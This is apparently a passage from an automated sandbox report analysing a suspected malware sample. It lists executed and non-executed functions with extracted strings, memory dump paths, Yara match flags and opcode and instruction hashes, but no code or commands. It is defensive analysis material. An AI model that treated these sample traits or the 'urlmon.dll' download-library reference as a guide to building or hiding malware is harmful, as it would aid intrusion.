                                                                    • Opcode Fuzzy Hash: 8ed2d63b5823b61fccda82c1bc43e65eb250aff6c4ae293b585f8cfc359736ad
                                                                    • Instruction Fuzzy Hash: 6C2165BAA0011AABDB11DF79CC40EEF7BF9FF54640F44011AEA05EB240E730DA018BA5
                                                                    Function 0156F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RTL: Re-Waiting, xrefs: 015B031E
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015B02BD
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015B02E7
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                    • API String ID: 0-2474120054
                                                                    • Opcode ID: 3c3b4ca372b82fc48f2a22a961cb0dcebf1348ca08ad299a637f629c6b756eaa
                                                                    • Instruction ID: a674e4fb0bc523ed967d8f8c0b71c0d0f4af3b773f92901ec1bd7f946d6c93fa
                                                                    • Opcode Fuzzy Hash: 3c3b4ca372b82fc48f2a22a961cb0dcebf1348ca08ad299a637f629c6b756eaa
                                                                    • Instruction Fuzzy Hash: 1BE1BE30A087429FE725CF28D894B6ABBE4BB84314F140A5EF5A58F2E1D774D945CB82
                                                                    Function 0157BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 015B7B7F
                                                                    • RTL: Re-Waiting, xrefs: 015B7BAC
                                                                    • RTL: Resource at %p, xrefs: 015B7B8E
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 0-871070163
                                                                    • Opcode ID: 8378ea16a9444d1c5708ff42e8681f700dedb36fdf1c59774dd84d10b27085a0
                                                                    • Instruction ID: 6f0a6934d8be24356f530018489a1afd3ddcb48d9655e5a470e8cb6471d877d8
                                                                    • Opcode Fuzzy Hash: 8378ea16a9444d1c5708ff42e8681f700dedb36fdf1c59774dd84d10b27085a0
                                                                    • Instruction Fuzzy Hash: 5B41D1313047039FD720DE29D841B6AB7E5FF89B10F000A1DE966DF280EB72E5058B91
                                                                    Function 0157B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015B728C
                                                                    Strings
                                                                    • RTL: Re-Waiting, xrefs: 015B72C1
                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 015B7294
                                                                    • RTL: Resource at %p, xrefs: 015B72A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 885266447-605551621
                                                                    • Opcode ID: dda452983faa896c13a732d123bc374b3ceff7c0dd35e263b1daa6cfc4fae61c
                                                                    • Instruction ID: 9a9cbc6ac72bcec2bb6bfe458a9f45bbbbbacbd4580b7df5b96fdf1c73e1ddff
                                                                    • Opcode Fuzzy Hash: dda452983faa896c13a732d123bc374b3ceff7c0dd35e263b1daa6cfc4fae61c
                                                                    • Instruction Fuzzy Hash: 6141D231600207AFD721DE69CC82FAAB7E6FB99710F140619F955EF280DB31E84287D1
                                                                    Function 015F2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$]:%u
                                                                    • API String ID: 48624451-3050659472
                                                                    • Opcode ID: 5fc903e709bb08d993a2499c57e350d026b9d14cd4bf531d2fc0e43b1551afe1
                                                                    • Instruction ID: 4539a4a9f5300f54ac530a4c949458a699031029d7179cfc0662cda0866ab074
                                                                    • Opcode Fuzzy Hash: 5fc903e709bb08d993a2499c57e350d026b9d14cd4bf531d2fc0e43b1551afe1
                                                                    • Instruction Fuzzy Hash: D23178B2A006199FDB60DF2DCC40BEEB7F8FF54610F444559E949E7240EB30DA448BA0
                                                                    Function 01587D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-
                                                                    • API String ID: 1302938615-2137968064
                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                    • Instruction ID: 2d6b0472367d2518f4dd597210019a50586eaade0aba5d804c3817dfb1f2dff8
                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                    • Instruction Fuzzy Hash: 3D918471E002169EEB24FF6DC8816BEBBA5FF88720F64451AE965FF2C0D73099418751
                                                                    Function 01549126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$@
                                                                    • API String ID: 0-1194432280
                                                                    • Opcode ID: 0fded06efbf40016d11d947e523caac0eeb3eb89edfc60270b32ef7119abe39e
                                                                    • Instruction ID: a0e168fdcb4b4ef6e7936fcfdf9e022ac020d06ef37f47588903b001a3f5765c
                                                                    • Opcode Fuzzy Hash: 0fded06efbf40016d11d947e523caac0eeb3eb89edfc60270b32ef7119abe39e
                                                                    • Instruction Fuzzy Hash: F8811D71D4126A9BDB31CB54CC45BEEB7B4BF48754F0041EAAA19BB240D7705E84CFA0
                                                                    Function 015CCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 015CCFBD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: CallFilterFunc@8
                                                                    • String ID: @$@4Qw@4Qw
                                                                    • API String ID: 4062629308-2383119779
                                                                    • Opcode ID: 6b28a03d69c8c19ff0878eedd35d8d618a0af7f84c7806ef58ce8bf05ef82bd5
                                                                    • Instruction ID: 205563853f83baf8a6da2d7e682fb221b8b60fd8e88e9ced83b293b1e835c721
                                                                    • Opcode Fuzzy Hash: 6b28a03d69c8c19ff0878eedd35d8d618a0af7f84c7806ef58ce8bf05ef82bd5
                                                                    • Instruction Fuzzy Hash: 5D414971900216DFDB21AFE9C840AAEBBB8FF95B50F00442EE915EF254E734D941CBA5

                                                                    Executed Functions

                                                                    Function 04F1E285 Relevance: 31.7, Strings: 25, Instructions: 469COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #$ B$#$%y$19$2$>$D$E$GP$K_$PP$Qt$V$`J$c6$f$m$o$v>$x$}$,$>$_
                                                                    • API String ID: 0-1984175023
                                                                    • Opcode ID: 15635339f0c4b65a3d3d39204c601abd77c9bd04931a466fced5cd5a72c5aebe
                                                                    • Instruction ID: 1550b7dbd848911bceabc9bdad2ff401c9c2423f0f709b39d736918b9e9c40f6
                                                                    • Opcode Fuzzy Hash: 15635339f0c4b65a3d3d39204c601abd77c9bd04931a466fced5cd5a72c5aebe
                                                                    • Instruction Fuzzy Hash: 0D42ADB0E0526DCBEB68CF04C895BDDBBB2BB44308F1081D9D5496B290DBB56AC5DF81
                                                                    Function 04F2C005 Relevance: 6.4, Strings: 5, Instructions: 152COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6$O$S$\$s
                                                                    • API String ID: 0-3854637164
                                                                    • Opcode ID: 74f2a845a8c98f1cbd2e33735c6ec5c448920ce1012c5b9301475194a65474ab
                                                                    • Instruction ID: a6520c564590fbfd582fd2cae62102ffd3c0632b01846d80e4ef5cfbd72b84f3
                                                                    • Opcode Fuzzy Hash: 74f2a845a8c98f1cbd2e33735c6ec5c448920ce1012c5b9301475194a65474ab
                                                                    • Instruction Fuzzy Hash: 4E5195B2D00119ABDB10EFD4DD49EEFF3B8EF44719F044199E9086B140E7756A4A8BA1
                                                                    Function 04F39255 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: yi
                                                                    • API String ID: 0-2336885180
                                                                    • Opcode ID: 7e633b2ae547646173275aff670ba6d686053eb1c4c3826f853a7315fe6ab9b1
                                                                    • Instruction ID: 2cd3499c83b7b3c3f30cef7a06e8ae91b4ae34d107127802821e7bcda55e6e4f
                                                                    • Opcode Fuzzy Hash: 7e633b2ae547646173275aff670ba6d686053eb1c4c3826f853a7315fe6ab9b1
                                                                    • Instruction Fuzzy Hash: 6E21FEB6D01219AF9B00DFE9D8408EFB7F9EF88310F04456AE919E7200E7716A058BA1
                                                                    Function 04F178A7 Relevance: .1, Instructions: 136COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fe2754626f8af1bbdcf6b223d733a6facd9102d29d1880a7fd82e0560f6a1c56
                                                                    • Instruction ID: f8f5c938ed042e69177a440a2b4bdd3d4e0d8f535adb7ecb33013a76b01d3d7a
                                                                    • Opcode Fuzzy Hash: fe2754626f8af1bbdcf6b223d733a6facd9102d29d1880a7fd82e0560f6a1c56
                                                                    • Instruction Fuzzy Hash: 5941FEB1D11218AFDB14DF99CC81AEEBBBCEF49710F10455AF918E7240E7B1A641CBA4
                                                                    Function 04F3C975 Relevance: .1, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f413d01f484df2d047b2e8d45919c4bb039abd2104dac6aa64f115fee20feb2e
                                                                    • Instruction ID: 6360129594d36ef73509c73303c8c629efaa9fa4e9de4618d84ef3adc4da3bbd
                                                                    • Opcode Fuzzy Hash: f413d01f484df2d047b2e8d45919c4bb039abd2104dac6aa64f115fee20feb2e
                                                                    • Instruction Fuzzy Hash: 5831F8B5A00248ABDB14DF99CC81EEFB7F9EF88704F108119F909A7340E774A911CBA1
                                                                    Function 04F3D275 Relevance: .1, Instructions: 77COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 218d563c39c0a71cd3337df9d9d62a9197f35fc4b4fe87b00bf36fddaed69bb2
                                                                    • Instruction ID: d8dc43dc0d1a2cb9de16b5d90b2545a29dbbe780650f8a7bf5cbfbb93f0fcff2
                                                                    • Opcode Fuzzy Hash: 218d563c39c0a71cd3337df9d9d62a9197f35fc4b4fe87b00bf36fddaed69bb2
                                                                    • Instruction Fuzzy Hash: E42119B1A04349AFEB14DF98CC81EAFB7B8EF88710F104109F909AB240D774B911CBA5
                                                                    Function 04F2BE45 Relevance: .1, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 963cbaa09def02e4d1eb9250690dfd1d3dff3227b0342066ff4c39344effe0cf
                                                                    • Instruction ID: f9a0ff2ffb061625e25e72ca3c1b45ad594b39ca1e436f24e778a1908f2b903e
                                                                    • Opcode Fuzzy Hash: 963cbaa09def02e4d1eb9250690dfd1d3dff3227b0342066ff4c39344effe0cf
                                                                    • Instruction Fuzzy Hash: E31170B27802067AF720AE558C43FAB776CDB85B55F244015FF08AE2C1DAA4F81246B4
                                                                    Function 04F3C615 Relevance: .1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 65140a3b059ee79970d215b499d4bce6e3d18515d929f97248ad41fbe4fefd5c
                                                                    • Instruction ID: 8ff30458c09378137f811746312c8c28ef1febe167dd8d33d763c85ccf684b77
                                                                    • Opcode Fuzzy Hash: 65140a3b059ee79970d215b499d4bce6e3d18515d929f97248ad41fbe4fefd5c
                                                                    • Instruction Fuzzy Hash: B8115E71A05349ABE720EF98CC45FAB77ACEF85715F104509F948AB280EA707912CBA1
                                                                    Function 04F3C795 Relevance: .1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a4ead1439963b26653c200fde1fbbf3326f591bd6fe7ccce56ac6fc5d71bfee7
                                                                    • Instruction ID: 612a93f9d475169d2552b5ef1a4e9510557e091046d06fa9d60ebdd381ff003e
                                                                    • Opcode Fuzzy Hash: a4ead1439963b26653c200fde1fbbf3326f591bd6fe7ccce56ac6fc5d71bfee7
                                                                    • Instruction Fuzzy Hash: BA115E71904348BBE710EF98CC45FAB77ACEF85715F104409F9486B280EA747911CBA5
                                                                    Function 04F3A595 Relevance: .1, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b9ff44f630e79ce15d8ce08663523b67a53b04885dae65d290f6903aa3378063
                                                                    • Instruction ID: b2b6af3ce24ff53a0838b39572a207b9671fc327c3d3948a8c58462cdb5af4b6
                                                                    • Opcode Fuzzy Hash: b9ff44f630e79ce15d8ce08663523b67a53b04885dae65d290f6903aa3378063
                                                                    • Instruction Fuzzy Hash: DD1100B6D0121DAF9B00DFE9D8519EEB7F9EF48210F04415AE919E7200E7716A05CBA0
                                                                    Function 04F3D5B5 Relevance: .0, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                                    • Instruction ID: af523805e0155f855e02f8c9bf7326623ffa9249fed779c3684288d9eb72aaaa
                                                                    • Opcode Fuzzy Hash: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                                    • Instruction Fuzzy Hash: D2018CB2215508BBDB44DF99DC90EEB77ADEF8C754F508208BA0DE3240D630F9528BA4
                                                                    Function 04F391C5 Relevance: .0, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b126ddd99a82b0e6a5761decd8d6853ac45a813b476234a54d0b7561d2c41cb1
                                                                    • Instruction ID: dc8449f29cb0030a5392eb5508df6a5a6c0ad79368f4d7372fba565dbfd18033
                                                                    • Opcode Fuzzy Hash: b126ddd99a82b0e6a5761decd8d6853ac45a813b476234a54d0b7561d2c41cb1
                                                                    • Instruction Fuzzy Hash: BD01E9B6C0121DAFCB40DFE8D9409EEBBF8AB48300F14426AD519F7240F7706A048FA1
                                                                    Function 04F179F9 Relevance: .0, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7b773f3045ef178b27cc8625d8d0c61f63d74ef87bfe85eda7fcfbd899e03fc3
                                                                    • Instruction ID: ca32deef59c98a8d9a9471c72c49f8672c4b7a6d6e263fc58770d4301861b6bd
                                                                    • Opcode Fuzzy Hash: 7b773f3045ef178b27cc8625d8d0c61f63d74ef87bfe85eda7fcfbd899e03fc3
                                                                    • Instruction Fuzzy Hash: 2FF0B4736002165BE7206FADAC44B96B7DCEB84325F244227E91D9B2A1D732A8528690
                                                                    Function 04F2BFFC Relevance: .0, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 75cd10afc6497bc7a15310c65ed230a475c283ab31228889cdcd35a57f93b811
                                                                    • Instruction ID: da11161dfcffa5aa7b09c604477e0cef384f796e5c42dbd6d34f507c6ee1efcf
                                                                    • Opcode Fuzzy Hash: 75cd10afc6497bc7a15310c65ed230a475c283ab31228889cdcd35a57f93b811
                                                                    • Instruction Fuzzy Hash: 2DF07871C04294AEDB01EBA0CC48AFFBF74DF89319F0401C9D0082B151E630A98BC765
                                                                    Function 04F3C895 Relevance: .0, Instructions: 33COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 17a7bc8f7d8520c4bffdc9816d876c5e0740f6373924b595003b5f186f1b3574
                                                                    • Instruction ID: f3a27e5bc451dba3a04ee92547acb609c3b264ad4ebd0a2620740b434048de86
                                                                    • Opcode Fuzzy Hash: 17a7bc8f7d8520c4bffdc9816d876c5e0740f6373924b595003b5f186f1b3574
                                                                    • Instruction Fuzzy Hash: BBF015B6200209BBDB10EF89DC81EAB77ACEFC8714F004019BE08A7241D670B9218BF0
                                                                    Function 04F3D4F5 Relevance: .0, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                                    • Instruction ID: 5a3dfe6dce30207d41b9087a45d5cfb6b5b6499ee5bbbd584a9ccd4564d8e813
                                                                    • Opcode Fuzzy Hash: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                                    • Instruction Fuzzy Hash: C7E09A722042087BDA14EF59DC80E9B37ACEFC8710F000408FA08A7240DA31B9118BB4
                                                                    Function 04F2BF65 Relevance: .0, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bda29215af404e63ea5841a5bf47159a533bd7fbcf7b6c61d1dc4e162ad7e555
                                                                    • Instruction ID: 4f5724d16b9343ca1e2e589bfca40d6f3f6879e2197b858450d047ecdb1834b0
                                                                    • Opcode Fuzzy Hash: bda29215af404e63ea5841a5bf47159a533bd7fbcf7b6c61d1dc4e162ad7e555
                                                                    • Instruction Fuzzy Hash: FBF08271C15209EBDB14DFA4D841BDEBBB4EB04320F104369E8249B280E634A7519B81
                                                                    Function 04F3F335 Relevance: .0, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0a49911327731111d187c10d9df807f6481cb23bdff532a9ce64d2e3ccaf779b
                                                                    • Instruction ID: 27ce1c4af2fafebdfa913584d2171ccdc74045f22e5c34d3104f696302fbda00
                                                                    • Opcode Fuzzy Hash: 0a49911327731111d187c10d9df807f6481cb23bdff532a9ce64d2e3ccaf779b
                                                                    • Instruction Fuzzy Hash: 70E08C36E4032477E220A9899C06F9BB76CDFC5E72F150028FE089B340E560F90282F4
                                                                    Function 04F3D1E5 Relevance: .0, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                                    • Instruction ID: 06ff85bc42e4461fe2a77b059b8514b216b82f143db3adcb7b1e89cf53d79b4b
                                                                    • Opcode Fuzzy Hash: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                                    • Instruction Fuzzy Hash: EBE08C36200604BBE620FB59DC40E9BBB6CEFC6725F004015FA49A7240C670B9158BB0
                                                                    Function 04F1ECAF Relevance: .0, Instructions: 5COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 509f23a4164d918a7bed28faba1de9b67ef3dac0b22671988f2c0615dca0da36
                                                                    • Instruction ID: fe45511ffdac3e55a3ce87419786fe4239403bb1e1898218d0531048be9f0953
                                                                    • Opcode Fuzzy Hash: 509f23a4164d918a7bed28faba1de9b67ef3dac0b22671988f2c0615dca0da36
                                                                    • Instruction Fuzzy Hash:

                                                                    Non-executed Functions

                                                                    Function 04F36785 Relevance: 34.0, Strings: 27, Instructions: 265COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                    • API String ID: 0-1002149817
